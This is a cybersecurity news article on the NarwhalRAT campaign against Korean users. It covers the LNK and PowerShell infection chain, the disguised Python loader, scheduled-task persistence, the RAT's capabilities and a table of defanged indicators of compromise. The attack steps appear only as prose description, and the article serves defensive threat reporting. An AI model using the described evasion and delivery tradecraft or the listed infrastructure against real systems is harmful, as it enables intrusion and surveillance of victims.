Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT
Cybersecurity NewsArchived Jun 15, 2026✓ Full text saved
A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making […] The post Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT appeared first on Cyber Security Ne
Full text archived locally
✦ AI Summary· Claude Sonnet
HomeCyber Security News
Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT
By Tushar Subhra Dutta
June 15, 2026
A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception.
Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making it hard to catch.
The infection begins with a spear phishing email pretending to be an urgent security alert from the “Microsoft Account Team.”
The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document.
Analysts at Genians Security Center said in a report shared with Cyber Security News (CSN) that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026.
Researchers named the malware NarwhalRAT, drawing on the string “naverwhale” found inside its code, believed to be an attempt to masquerade as Naver Whale, a popular browser in South Korea.
The malware primarily targets Korean users, and its behavioral structure confirms this. NarwhalRAT uses “naverwhale” as its working directory name and assigns Hidden and System file attributes to the created folder to stay out of plain sight.
It also handles KakaoTalk-related window identifiers separately during data collection, strongly pointing to Korean targeting.
The threat actor operated a dual command-and-control structure using a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This lets the attacker change the actual C2 address without touching the malware, and helps traffic blend with normal web activity, making detection harder.
NarwhalRAT Loader Attack
When a victim clicks the malicious LNK file, a layered infection chain immediately begins. The LNK file uses CMD environment variable substring substitution to hide the real commands, dynamically rebuilding strings like “powershell” and “curl.exe” at runtime to evade static detection.
After deobfuscation, the LNK file launches PowerShell with execution policy bypassed and uses a copied curl.exe to download two files from the relay server.
The first is a decoy HWP document opened to keep the victim unsuspecting, while the second is a batch script named KHjWFcuS.bat that performs next-stage installation in a hidden window.
This technique of abusing built-in tools is classified as Living-off-the-Land. The batch file downloads the official Python embedded package to make the activity look like a normal software installation.
It renames Pythonw.exe to usersscreen.exe to suppress any console window. The final payload, config.cat, is disguised with a .cat extension to resemble a Windows security catalog, though it is actually compiled Python bytecode acting as a backdoor loader.
Decrypted Batch File Commands (Source – Genians)
For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” running at one-minute intervals. This name mimics a legitimate Microsoft task, making it hard for administrators to spot during inspection.
A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code with an embedded Base64-encoded payload.
NarwhalRAT Capabilities and C2 Communication
Once the payload executes in memory through fileless execution, NarwhalRAT reveals itself as a fully featured Remote Access Trojan. It first checks for virtual machine environments including VMware, VirtualBox, and Parallels Desktop to avoid sandbox analysis, a tactic typical of APT-level malware.
The RAT operates a command system built on more than 30 prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes.
Keystroke data is temporarily stored before being transmitted in batches, reducing real-time detection chances.
Prefix-Based Command Control System (Source – Genians)
From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, while also using pCloud as a Dead-drop Resolver secondary channel. Researchers noted that EDR policies need to be strengthened to detect chained abuse based on LNK and PowerShell.
Security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window.
Indicators of Compromise (IoCs):-
Type Indicator Description
Domain daehoat[.]com Primary C2 Korean relay server
Domain novel21[.]co[.]kr Primary C2 Korean relay server
Domain fe01[.]co[.]kr Initial ZIP file download relay
Domain webhostingkorea[.]com Secondary relay used in LNK and BAT download stages
File Name Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).lnk Malicious LNK file inside the phishing ZIP
File Name Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).zip Phishing ZIP archive attachment
File Name KHjWFcuS.bat Second-stage batch file delivering the Python loader
File Name config.cat Python bytecode backdoor loader disguised as Windows catalog file
File Name AccountConfig.cat Subsequent large Python payload with obfuscated RAT code
File Name usersscreen.exe Renamed Pythonw.exe used to silently execute the payload
Scheduled Task MicrosoftUserInterfacePicturesUpdateTackMachine Persistence scheduled task running at one-minute intervals
File Path C:\Users\Public\AccountPictures\UserInerfacePicture\ Directory where payload files are deployed
File Path C:\ProgramData\GoogleDriveUpdateCheck\ Directory where AccountConfig.cat is stored
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Tags
cyber security
cyber security news
Copy URL
Linkedin
Twitter
ReddIt
Telegram
Tushar Subhra Dutta
Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
Trending News
OWASP Releases AI Security Report to Empower Security Professionals with New Tools
Hackers Use OnyxC2 Malware-as-a-Service to Steal Credentials From 210 Applications
Slow Triage Is Raising Business Risk. Here’s How SOC Teams Cut Investigation Time
Threat Actors Abuse ChatGPT, Claude, and DeepSeek Brands as Phishing Lures to Steal Credentials
China-Linked JDY Botnet Uses 1,500+ SOHO and IoT Devices for Rapid Vulnerability Exploitation
Latest News
Cyber Security News
Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence
Cyber Security
SecSuite – AI-powered Tool for OSINT, Web and API Security Testing
Cyber Security News
WinRAR Vulnerability Exploited by Russian Hackers to Deploy GIFTEDCROOK Stealer
Cyber Security News
Palo Alto Warns of GlobalProtect VPN Vulnerability Actively Exploited in the Wild
Cyber Security News
Threat Actor Malware Platform Exposed via Unlocked PHP Installation Page